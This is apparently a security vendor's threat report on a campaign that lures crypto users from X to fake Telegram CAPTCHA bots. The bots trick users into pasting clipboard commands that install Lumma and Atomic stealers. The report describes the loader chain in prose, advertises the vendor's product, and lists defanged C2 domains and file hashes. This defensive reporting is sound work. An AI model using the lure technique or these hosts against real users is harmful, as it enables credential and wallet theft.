Cybercriminals are continuously evolving their tactics to exploit human behavior and trust. In one of the latest campaigns, attackers have weaponized fake CAPTCHA verification systems—tools typically used to verify a user’s legitimacy—to deliver malicious payloads.
Introduction
This campaign demonstrates an evolution from basic fake URL-based CAPTCHAs, seen in previous attacks, to a more sophisticated Telegram-based approach. The primary targets are cryptocurrency communities, where unsuspecting users are deceived into executing malicious scripts. This novel tactic highlights the rapid innovation and adaptability of cybercriminals in delivering malware.
Infection Chain
The infection chain begins on the X platform (formerly Twitter), where attackers hijack legitimate threads, enticing users to join Telegram and channels groups under the guise of helpful discussions.
Once inside these channels, victims are prompted to complete a CAPTCHA verification using a bot designed to mimic “Safeguard” – a popular Telegram bot used for user validation. This process ultimately leads to the deployment of the Lumma Stealer malware via multiple loaders, including the IDAT Loader (also known as Hijack Loader) and the Emmenthal Loader.
Hijacking Threads on X Platform
Threat actors exploit the X platform to infiltrate legitimate threads within the cryptocurrency community. By impersonating verified accounts or creating accounts with deceptive names and avatars that closely resemble the original poster, these actors strategically reply to popular posts from genuine crypto influencers. Their comments mimic the tone and content of the original thread, giving the appearance of helpful contributions to the discussion. Embedded within these replies are links directing users to Telegram groups and channels, setting the stage for the next phase of the attack.
Fake CAPTCHA via Telegram Mini Apps
When victims click on the Telegram link, they are presented with a post asking them to verify their identity using a fake Safeguard bot.
Clicking on the Tap to Verify button leads to fake Telegram bot with a handle resembling legitimate Safeguard variations, such as:
OfficiaISafeguardRobotSafeguardsAuthenticationBotSafeguardsauthbotOfficiaISafeguardRobotSafeguardOfficiaIRobotSafeguard_Officialbot
Based on the victim’s device, the bot tailors its behavior:
- Mobile Devices: A message is displayed stating that verification is not supported on mobile devices.
- Mac Machines: A command line is executed, delivering the Atomic Stealer malware.
- Windows Machines: The bot simulates a verification process by displaying a fake CAPTCHA that always fails, regardless of the victim’s input. It then suggests an “alternative verification method,” copying a malicious command to the victim’s clipboard and instructing them to execute it manually. Additionally, the bot sends an infection notification back to the attacker.
Clipboard Command
During the attack, two distinct loaders are observed, both delivering the same final payload: the IDAT Loader (also known as the Hijack Loader) and the Emmenthal Loader.
IDAT Loader
The malicious command copied to the victim’s clipboard fetches a second-stage PowerShell script from the attacker’s Command and Control (C2) server and executes it.
- The second-stage script sends a POST request to the C2 endpoint
/sendNotification.php, containing the message “PowerShell script executed successfully.” - Following this, the script downloads a ZIP archive, extracts its contents, and executes it. The extracted content is the Hijack Loader, which ends up loading the final payload – Lumma stealer.
Emmenthal Loader
The Emmenthal Loader begins its execution by leveraging mshta.exe to retrieve and execute an HTA file from the C2 server.
The HTA file includes a large binary blob that in between has the script to be executed within <script> tags. While these <script> tags are filled with junk code, the final extracted executed script is a six-line JavaScript code. This script constructs the next-stage payload by decoding an obfuscated string blob embedded at the beginning of the HTA file.
This JavaScript code executes heavily obfuscated PowerShell scripts in memory, ultimately delivering and executing the final payload – Lumma Stealer.
How Morphisec Can Help
Morphisec’s Automated Moving Target Defense (AMTD) technology proactively disrupts attacks with attack surface randomization — AMTD dynamically reshapes application memory, eliminating the framework attackers rely on. Morphisec preemptively neutralizes attacks at the earliest stage (including Lumma Stealer malware and other loaders), preventing any impact on the environment.
With its ultra-lightweight agent, Morphisec prevents unknown attacks and advanced threats while providing unprecedented visibility, requiring no prior knowledge of signatures, behavioral patterns, or indicators of attacks (IoAs).
Schedule a demo today to see how Morphisec stops advanced campaigns and emerging threats.
.png?height=229&width=800)
IOCs
C2
- truecoders[.]cyou
- byteguard[.]cyou
- rainstorm[.]cyou
- codecrafters[.]cyou
- stem-clasping[.]kliplaxupoi[.]shop
- 92p1ka158tr2[.]com
- cloudewahsj[.]shop
- rabidcowse[.]shop
- noisycuttej[.]shop
- latechilderni[.]cyou
- meow182[.]com
ZIP – Hijack Loader
- 4bf9b71414d8b06a02687ebe4caf61ad558bb9c2
- 44f448e150266cde73808a2b4226314358d4a8f5
- c17a7a559a47ab7e835eef840c55c490fdb93729
HTA – Emmenthal Loader
- a3f3d7f6704ccb0d8ba4431ad5f5bfa088c93dbd
- f34e950726b4a4ba9efcb34e5317971e5a60866b
- a50f2940e15b68c60d688dd3ce725a6ccf3d0831
- dd062bdcb616def4ff69f0e3816eb161fe0f537e
